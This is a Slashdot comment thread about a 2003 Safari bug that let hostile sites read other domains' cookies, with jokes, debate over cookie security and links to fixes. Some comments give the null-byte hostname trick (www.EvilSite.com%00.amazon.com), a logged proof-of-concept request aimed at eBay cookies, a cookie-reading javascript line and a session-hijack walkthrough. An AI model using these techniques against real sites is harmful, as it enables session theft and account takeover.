Safari Security Hole Allows Cookie Theft

An anonymous reader writes "MacSlash posted a story about a vulnerability in Safari. The exploit allows someone to steal any of your domain-based cookies (passwords, private info, etc.) from any website. Mozilla and Internet Explorer had the same bug in the past."

Sweet karma

Now's your chance, Karma Whores. Cut and paste the highest-rated comments from the MacSlash discussion over here, and moderators who are too lazy to have RTFA will throw "+1, Insightful" mods at you for free.

Of course, you then must live with being an utterly pathetic individual, but if you were considering doing something like this, it's probably too late to avoid that anyway.

Re:Sweet karma

Too much effort - it's so much easier than that. Apple rules! They handled it better than MS would have! Now mod me up.

One good reason...

[BrokenHalo]

to make a symlink from your cookies file to /dev/null. Who needs persistent cookies anyway?

Re:One good reason...

[Ianoo]

I find them rather useful when you just have to get that first post on a Slashdot article but can't remember your password. See, if you'd had cookies enabled, you might well have made it in time!

But seriously, I think cookies are a safe and generally useful concept. I have third-party cookies blocked since these can be downloaded with adverts and track you using the http-referer field. However, first party cookies are almost always safe.

Not having to log in again at every single site just makes it easier, IMHO. I back up my cookie data more often than my bookmarks.

Re:One good reason...

Don't all real browsers have a "accept cookie for current session only" setting?

Cookie theft?

That's it! Every hacker is grounded for the rest of the day.

I wonder.

[dtfinch]

Might the Konqueror browser be affected by this?

Re:I wonder.

[Ianoo]

Potentially, but I doubt it. The two browsers share a rendering engine, not much else. Cookies are purely a protocol issue, they add extra data when doing a GET/POST request on a web page. Nothing whatsoever to do with HTML rendering.

Potentially a bug could exist in the Javascript engine, and since Javascript can access cookies, and they could be stolen this way. However this particular bug doesn't appear to be JS-related, rather it's something more fundamental (but easily fixed by Apple, hopefully).

Since Konqueror uses KDE/QT's socket classes, whilst Safari uses the Carbon/Darwin sockets interface, it's unlikely the bug would rear it's head in Konqueror IMHO.

Re:I wonder.

why don't you get off your ass and try it, mr. +5 informative?

Re:I wonder.

[Ianoo]

Because I use Epiphany on my PCs running Linux and don't have Konqueror installed?

I do!

[LittleBigLui]

I'm a lazy bum you insensitive clod!

Should watch similar products

[shaka999]

Just goes to show that companies should closely monitor security holes in competing products.

Cookie Theft

[dpdawson]

Marc Slemko: Apple stole the cookie from the cookie jar.

Apple: Who me?

Marc Slemko: Yes, you.

Apple: Couldn't be.

Marc Slemko: Then who?

Re:Cookie Theft

Apple: Bill Gates stole the cookie from the cookie jar.

Slashdot: BURN HIM!

MacSlash: BURN HIM!

AppleLust: BURN HIM!

Think Secret: BURN HIM!

Steve Jobs: Tee hee. What a bunch of sheep.

Re:Cookie Theft

[TClevenger]

Bastard! That song'll be in my head for a week!

Safari and Konqueror

[CliffH]

Just a quick question to throw out there.

I know Safari uses KHTML as its rendering engine (ala Konqueror). How much more of the Konqueror code is used in Safari and could Konq possibly face this same issue and no one has stumbled on it? Forgive me if it's a stupid question, I've had about 2 hours sleep, my car broke down after taking my wife to work at 4am, and now I have to wait up because it's too late to get back to sleep before picking her up and waking up my son. Sounds like a lousy country song, huh. :)

Re:Safari and Konqueror

[Ianoo]

This is a repeat of the earlier parent on the same issue. See my comment here. Basically I'm pretty sure the answer is no.

Re:Safari and Konqueror

[CliffH]

Sorry about that. :) As it was early early in the AM over her (NZ), I was typing kinda slow and started posting that when there were three posts up. I'm pretty sure you're right too. I think we would have heard about it by now if it were the case, but, to be on the safe side, we should all check out our Konqueror installations against any sites that test for it (I'd advise caution if you have any cookies saved with sensitive passwords for sensitive sites though). Now, I think I'm going to try and get some sleep. :)

Re:Safari and Konqueror

[Ianoo]

No worries, I didn't mean for you to get modded redundant, I just couldn't be bothered to type out or copy-n-paste the entire response again.

Doesn't affect me?

I am trying the "test" and all I get is:


Please wait while loading the script

You are stuck on this page ?
It means that your browser is not vulnerable, sorry, or maybe, not so
sorry, it's how the things should be !!!.
You can press the back button now :)


I am running Safari 1.1.1 (v100.1). Could it be because
of This Hint?

Re:Doesn't affect me?

[goombah99]

I doubt that hint is the answer you think it is. they are talking about stealing your existing cookies. in the case of the test site i would imagine they are writing and then stealing back a test cookie. since this takesplace all in one session the lock should be irrelevant.

Re:Doesn't affect me?

I know what they are talking about. I went to some other sites, then verified that the sites had set some cookies by checking my Safari preferences. I then proceed directly to the test page, and no matter which cookie I put in (yes, I am putting the dot in front of them, for example ".macosxhints.com" with or without quotes). Every time I get that same message saying I am not voulnerable (sp?).

As an aside how come Safari isn't doing spell cheking in this field? Isn't it supposed to ?

Re:Doesn't affect me?

[Carthag]

It doesn't affect me either (Safari 1.0 v85). I'm assuming this is because I have Privoxy running.

Re:Frost Perst?

Cookie monster wanted for questioning..

Keebler stocks plummeted in the morning hours of the stock exchange, analysts predict its going to get worse before it gets better.

Fix it, but... what's the fuss?

[jtheory]

The exploit allows someone to steal any of your domain-based cookies (passwords, private info, etc.) from any website.

Any security hole should be fixed, but this is not as serious as they make it sound.

Passwords? Private info? What serious web developer would be keeps these in a cookie? Cookies are not secure. They are stored unencrypted on the user's hard drive (where they are easily rifled through), and (as mentioned) there have been plenty of bugs in the past that have made their data accessible to John Q. Hacker.

Cookies are mostly used for storing session ids, or another meaningless number that links back to the real info stored in a database on the server (yes, you don't want a hacker reading your session id, but this is a much lower risk).

This is not just for security reasons -- it's because cookies are not reliable. Cookies get wiped out all the time (all browsers that I know of let you delete them, and I see lots of ads for software that offers to manage, delete, filter, or "clean them up" for me.

Also, cookie size is limited (and does this differ on the diff browsers? I know GET request size does), so you could screw yourself over if you were storing a user's personal info and their address was really long.

Why would you store username/password data in a cookie anyway? Most browsers do this for you now, *and* they are more secure about it. Hm.

These are the best practices I was taught, at any rate. I didn't checked slashcode before posting this... and I suppose it is true that best practices are not always followed.

Does anyone have a real sense of how often sensitive data is stored unencrypted in a cookie?

Re:Fix it, but... what's the fuss?

[Taran]

If the web app allows you to edit your information once you've aquired an authorized session, then stealing that authorized session could allow someone to hijack your information and/or your identity with that web app/company.

Re:Fix it, but... what's the fuss?

[Hanji]

This is true, and is one of the reasons that this is indeed a potential problem, but nonetheless, for a well-designed session implementation, this should be a relatively small window of opportunity for a hacker to exploit. I'm not saying it can't be done, just that the risk isn't particularly huge, especially when you consider that, (as I understand it), this exploit only allows malicious code to access cookies from a domain that it requests, not to scan through all available cookies. In other words, hackers would have to guess a website that you have a sensitive cookie for, and then get to that site before the session expired.
Possible? Sure
Probable? Doubtful

Re:Fix it, but... what's the fuss?

[frankie]

Passwords? Private info? What serious web developer would be keeps these in a cookie?

Well... your Slasdot login is (hashed but stealable) in a cookie right now.

javascript:alert(unescape(unescape( document.cookies)))

Perhaps that doesn't qualify as "serious", but don't come crying to me when your karma bottoms out after "you" post 500 goatse trolls in a row.

Re:Fix it, but... what's the fuss?

[Ed+Avis]

I've never understood why sites such as Slashdot want to use cookies for authorization... what's wrong with the standard username/password dialogue box that the browser is able to pop up and which servers like Apache easily support? That means a consistent user interface for logging in across sites, and if the user presses Cancel then he's taken to a sign-up page. The New York Times site seems to be one of the few that does this right.

Re:Fix it, but... what's the fuss?

Actually the gotcha is with Session Cookies :) Get one of these that isn't bound to a specific IP address and you can sometimes by pass the login to a web application.

Then you can get to the personal information, the private information, etc...

Your, not very imaginative I gather.

Re:Fix it, but... what's the fuss?

The new york times doesn't use http auth, last I checked. HTML forms and cookies, just like everyone else . . .

Re:Fix it, but... what's the fuss?

[Ed+Avis]

Heh, shows how long it has been since I last visited their site and logged in... nowadays I don't bother unless someone finds the publicly-accessible link.

Re:Fix it, but... what's the fuss?

[fritz+il+gatto]

Passwords? Private info? What serious web developer would be keeps these in a cookie? Slashdot, for example

i new the cookie monster...

[s33l3t]

was real the first time i saw him on Sesame Street. everyone protect your cookies, ill bbl i need to find the count to make sure mine are all there.

Re:i new the cookie monster...

Practice your English more. You'll get there, I believe in you.

Re:i new the cookie monster...

[s33l3t]

you are correct, thank you grammar nazi. proof reading == power.

Another Hole...

Apple needs to fix the disappearing laptop bug first. Every time I leave my laptop on a library desk and use the bathroom, my laptop is gone when I get back. Apple needs to fix this ASAP.

Re:Another Hole...

[valmont]

Apple's Reply:

Get a DELL, dude.

Re:Another Hole...

This is just another example of Apple's appalling lack of customer service. They SHOULD replace this, as soon as possible. After all we have been through to keep using Apple computers? Slightings from our jealous friends. Incompabilities with outdated and poorly managed corporate networks. The Humanity!

And Apple should make sure all of your data is still on it as well.

But no - now Apple is pulling a Microsoft... "No we won't replace your laptop that you ran over with your lawnmower..." What a disgrace...

Re:http://www.broadcastadvertise.com/

WTF? I can't believe people are spamming Slashdot!

That's not the biggest Safari bug

[azav]

Safari is horrible with regards to clearing cached items and gobbling up disk space.

I have a gig free on my Ti and after a morning of browsing, it's down to 500Meg. Quitting Safari does not free up this space. Restarting does.

One would expect Safari to be much more well behaved because when the hard drive fills up, other apps often lose their prefs and general hell breaks lose.

REAL PITA.

Re:That's not the biggest Safari bug

This isn't a Safari bug, this is how your OS deals with virtual memory.

Look in /var/vm

And you will see... swapfile1, swapfile2... etc. The OS creates these as needed.

Now for the OS to recover swap space, there has no be no pages addressed to a swap file. When you run Safari what gets paged out to disk? Not safari, but all the other applications you are running. Therefore, quitting Safari does nothing. The OS won't page in the swap unless you need access to that page of memory.

Re:That's not the biggest Safari bug

[Hes+Nikke]

hmmm...
Safari -> Empty Cache

or you could push cmd-option-E

i think your gripe is more that you can't control the size of your cache, but some creative partitioning with a side of fstab could fix that :)

my gripe is that safari doesn't seem to take advantage of the cache to the same extent that IE and Moz do, slowing down loading of mostly static pages and images

but i still prefer it to any other browser out there :)

Re:That's not the biggest Safari bug

[MalleusEBHC]

You can also just logout/login. This will clear all user/non-system swapfiles.

Re:That's not the biggest Safari bug

[azav]

Nice but that doesn't completely take care of the problem. I've got 467 Meg free now while I had a gig 30 mins ago. Ick.

Re:That's not the biggest Safari bug

It's that 17meg file you're downloading. Try your Pentium 200...

Symptom of underlying problem

[TheLink]

The real problem seems to be using a programming language that uses null termination. When you allow "commands" and data to intermingle so closely you are inviting trouble.

Re:Sweet and sour karma

Well, I don't frequent those pages so as far as I know this is my very own anonymously cowardly play on words

Regarding the similar holes in other browsers:

Those that don't learn from histories/cookies are bound to repeat them. Also, those that don't learn from histories/cookies are bound to repeat them.

PATCHED ALREADY!

[goombah99]

move along. no story here. Uh hate to burst everyones' bubble but this is patched if you are using safari version 1.1.1

as long as I'm reposting things from MacSlash here's one: see for your self by testing the exploit here.

Re:PATCHED ALREADY!

[bill_mcgonigle]

as long as I'm reposting things from MacSlash

Hey, at least repost the right stuff. :)

Re:PATCHED ALREADY!

[valmont]

no it is not already patched. I am running Safari 1.1.1 (v100.1), and the insecure website's proof-of-concept DOES show me ALL cookie stored in the .ebay.com domain.

Re:PATCHED ALREADY!

[Squozen]

Well, I'm running the latest Safari and gave this a test:

ERROR

The requested URL could not be retrieved

While trying to process the request:
GET http://www.insecure.ws%00.ebay.com/cgi-bin/cook HTTP/1.1
Accept: */*
Accept-Language: en, ja;q=0.92, ja-jp;q=0.96, fr;q=0.88, de-de;q=0.85, de;q=0.81, es;q=0.77, it-it;q=0.73, it;q=0.69, nl-nl;q=0.65, nl;q=0.62, sv-se;q=0.58, sv;q=0.54, no-no;q=0.50, no;q=0.46, da-dk;q=0.42, da;q=0.38, fi-fi;q=0.35, fi;q=0.31, pt-pt;q=0.27, pt;q=0.23
Accept-Encoding: gzip, deflate;q=1.0, identity;q=0.5, *;q=0
Referer: http://www.insecure.ws/cgi-bin/cookie?input=.ebay. com
User-Agent: Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/103u (KHTML, like Gecko) Safari/100.1
Connection: close
Host: www.insecure.ws

The following error was encountered:
Invalid Request

Some aspect of the HTTP Request is invalid. Possible problems:
Missing or unknown request method
Missing URL
Missing HTTP Identifier (HTTP/1.0)
Request is too large
Content-Length missing for POST or PUT requests
Illegal character in hostname; underscores are not allowed

Your cache administrator is webmaster.

Generated Sat, 22 Nov 2003 00:28:00 GMT by clavin.korangar.cable.nu (squid/2.5.STABLE4)

Looks like Squid won't allow this malformed request through. Hurray for open source software!

Re:PATCHED ALREADY!

[andreMA]

How many ebay cookies do you have? I got a vaguely similar error (not via squid) when tossing junk cookies from 2o7.net at it, but it was able to steal cookies when I chose another domain that had only set one cookie... consistent with teh "Request too large" listed as a possible cause of the error.

temporary patch

http://www.securityfocus.com/archive/1/345221

Firebird

[lordDallan]

While you're waiting for Apple to patch this why not check out Mozilla Firebird 0.7 for OS X.

It is a great, feature rich browser. Of course you could also check out Mozilla 1.5, Camino, Netscape, iCab, Omni Web, Opera, or even IE 5 or MSN for the Mac

All of these can be downloaded from their respective sites, or from the Internet Utilities section of Apple's Mac OS X Downloads page.

Cookie theft?!

Oh no! Where's the key for the safe?! I don't want anybody taking my oreos!

(Not) PATCHED ALREADY!

[sld126]

Safari 1.1.1 (v100.1)

Still see my ebay cookies.

Maybe you cleared your cookie cache or have accepting them turned off?

OmniWeb and KHTML

[Lagos]

First of all note that OmniWeb is not affected by this bug. Outside of a lack of tabs, it's a very good Web Browser that should satisfy you until Apple patches this bug. Of course, I'm sure the Slashdot readership is aware of other options as well.

As for the discussion as to whether this is a bug in KHTML in general, it is not. The bug is in the way browsers parse the hostname out of a URL differently for cookies and the connection itself. So in Safari the url:

http://www.EvilSite.com%00.amazon.com/

will connect to www.EvilSite.com, but be considered in the domain of .amazon.com for the purpose of cookie security. This seems to be a bug in the code around KHTML, not KHTML itself, since vulnerable OmniWeb uses the same WebCore framework that is used by Safari without being vulnerable.

What about the CURRENT version of Safari?

[hammarlund]

Does this affect the CURRENT version of Safari, v=1.1.1? I don't think so since I tried the http://alive.znep.com/~marcs/security/mozillacooki e/demo.html, link and it didn't send anything back.

Hash in your cookie

[jtheory]

Heh, aren't brownies the more traditional medium?

Anyway, my post did have the caveat that I did NOT review slashcode before posting.... Honestly, though, slashdot seems to be designed so that you can have as much security as you want, even if that cookie has a hash of sensitive data instead of a temporary session id.

You can control whether your login (held in the cookie) lasts for the browser session only, vs. a whole year. You can also manually logout whenever you want (again, deletes the cookie).

If you do either of those (and don't visit possible cracker-owned sites while you're logged in) you are perfectly safe, since the hacker won't ever be able to see the slashdot cookie.

[I'm assuming that's a hash of the username AND password -- if it's only the username, that's insecure, since the cracker could just figure out the hash algorithm and make cookies from whatever username they wanted.]

Slashdot is unusual in that we have that option (because Taco figures we'll understand it, I guess). In general, sites decide this for you, and don't allow "eternal login" if there's sensitive data at risk -- at most they will save your login name for you (but not the password).

See? No goatse.

But if you proxy...

[sitharus]

I'm not vulnerable because Squid catches the URL and says 'NO! Bad!'. Using a proxy means the whole URL gets passed to the proxy, creating an error page.

Still, irritating bug.

Here is the fix for this exploit:

[Giffut]

http://hetima.com/soft/cookiemonsterfix.html Scroll down for the english explanations. But you also can proceed to download the DMG file itself, as substancial english documentation is included there. G

Fix available : CookieMonsterFix ?

[battambang]

FYI, French mac site Macbidouille recommends a fix: CookieMonsterFix.
I ran it against 10.2.8 + Safari 1.0.1 (v85.6) and it looks like it works. The readme says it works with Panther as well.

3rd Party Fix

[stefanb]

This BugTraq post links to a Japanese page with a fix (English text at the bottom).

I was bit dubious at first, but the patch includes source code. I did install the supplied binary, though...

What I'm really surprised about however is the fact that a) a third-party developer can fix a problem like this at all, and how easily the fix can be hooked into Safari. It appears that this OpenStep/Cocoa framework stuff is really flexible...

Oh and yes, it does work!

Re:3rd Party Fix

[stefanb]

I just went ahead and rebuilt it, and the binary is indentical to the one that they ship:

64446 18 /Library/InputManagers/CookieMonsterFix/CookieMons terFix.bundle/Contents/MacOS/CookieMonsterFix
64446 18 /Users/stb/working/cookiemonsterfix/build/CookieMo nsterFix.bundle/Contents/MacOS/CookieMonsterFix

Re:3rd Party Fix

Not saying they aren't identical, but usually people use md5 instead of file sizes to confirm these things. man md5 to read more . . .

Hmm.

[jtheory]

Your, not very imaginative I gather.

Hey, now; be nice. I thought I talked about this somewhere, but here's more detail.

You're right that session cookies are a security hole, but it's much harder to use them, because most of the time when you steal them they're useless. Sessions expire, or are closed on log-out.

If you do your banking online, do you log out? Do you close the browser? Or do you even wait 15 minutes before browing to the shadier parts of the internet? Any of those and you're safe.

Here's what would have to happen for your banking session to be hijacked:
1) You log into your bank.
2) Without logging out or closing the browser first, you go to a hacker-controlled website.
3) The hacker's code requests the cookie for yourbank.com -- it must grab the cookie for that exact domain name.
4) The hacker, within the next 10-15 minutes, uses the cookie to jump into your logged-in session at yourbank.com..

Not so easy. The big problem is how to get you to visit h4x0rh0m3.com with an active session cookie from a known site.

And this is all assuming that yourbank.com doesn't do that extra check to see if your IP changes mid-session... and I'll bet most sites with dangerous access like that do.